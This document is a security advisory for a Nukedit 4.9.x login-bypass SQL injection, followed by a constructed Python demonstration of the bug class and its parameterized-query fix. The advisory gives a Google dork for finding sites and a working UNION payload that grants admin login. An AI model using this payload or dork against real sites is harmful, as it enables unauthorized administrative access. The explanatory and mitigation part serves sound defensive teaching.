#Title: Nukedit 4.9.x Login Bypass SQL Injection
#
#Discovered By: r3dm0v3
# http://r3dm0v3.persianblog.ir
# r3dm0v3( 4t ) yahoo [dot] com
# Tehran - Iran
#
#Download: http://www.nukedit.com/content/Download.asp
#Vulnerable: 4.9.x; prior versions may also be vulnerable
#Remote: Yes
#Dork: "Powered by Nukedit"
# inurl:utilities/login.asp
#Fix: Not Available
#
#POC:
#Go to http://target.com/[path_to_nukedit]/utilities/login.asp and fill in the login fields as below:
#Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x
#Password: r3dm0v3
#Click Login and you will be logged in as an admin.
#
#There are other SQL injections in other pages.
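The advisory only gives the payload, but its shape tells a defender what the bug class is: the email field is concatenated into the login query, and the application then verifies the entered password against the hash column of whatever row comes back, so a UNION row carrying an attacker-chosen hash (here the hash of the password typed into the second field) satisfies the check. The Python below is an added illustration of that pattern and its fix; it is not Nukedit's code. The 4-column `tblusers` table, the `login_vulnerable`/`login_hardened` functions, the sample account and the use of SHA-256 as a stand-in for a real password KDF are all constructed for this example (Nukedit's 20-column table and `ENC...` hash format are not reproduced).

```python
"""Constructed demonstration of a UNION-based login bypass and its mitigation.
Schema, accounts and hashing are sample data for this example only."""
import hashlib
import hmac
import sqlite3


def pw_hash(password: str) -> str:
    # Stand-in for a real password KDF (bcrypt/scrypt/argon2); unsalted SHA-256
    # is used here only to keep the example self-contained.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database with one constructed admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tblusers (id INTEGER, email TEXT, pwhash TEXT, is_admin INTEGER)"
    )
    conn.execute(
        "INSERT INTO tblusers VALUES (1, 'admin@example.test', ?, 1)",
        (pw_hash("correct horse battery"),),
    )
    return conn


def login_vulnerable(conn, email: str, password: str):
    """Bug class from the advisory: the email is spliced into the SQL text, and the
    password is compared against the hash column of whatever row the query returns."""
    sql = f"SELECT id, email, pwhash, is_admin FROM tblusers WHERE email = '{email}'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return None
    if row[2] == pw_hash(password):
        return {"id": row[0], "email": row[1], "is_admin": bool(row[3])}
    return None


def login_hardened(conn, email: str, password: str):
    """Fix: bind the email as a parameter so it can never alter the query, and use a
    constant-time comparison for the hash check."""
    row = conn.execute(
        "SELECT id, email, pwhash, is_admin FROM tblusers WHERE email = ?", (email,)
    ).fetchone()
    if row is None:
        return None
    if hmac.compare_digest(row[2], pw_hash(password)):
        return {"id": row[0], "email": row[1], "is_admin": bool(row[3])}
    return None


# Same shape as the advisory's payload, adapted to the 4-column constructed schema:
# the injected row supplies its own hash, matching the password typed alongside it.
ATTACKER_PASSWORD = "r3dm0v3"
PAYLOAD_EMAIL = (
    f"' union select 1,'attacker',"
    f"'{pw_hash(ATTACKER_PASSWORD)}',1 from tblusers where 'x'='x"
)


def demo():
    """Returns (vulnerable_result, hardened_result) for the injected login attempt."""
    vuln = login_vulnerable(make_db(), PAYLOAD_EMAIL, ATTACKER_PASSWORD)
    hard = login_hardened(make_db(), PAYLOAD_EMAIL, ATTACKER_PASSWORD)
    return vuln, hard


if __name__ == "__main__":
    vuln, hard = demo()
    print("vulnerable login result:", vuln)   # attacker row, is_admin True
    print("hardened login result:  ", hard)   # None: no such email
```

With the parameterized query the injected string is looked up literally as an email address and matches nothing, so the attacker-supplied hash is never reached. The second change matters independently: even with parameter binding, the application should compare the typed password against the hash stored for the matched account, which is exactly what binding guarantees the returned row to be.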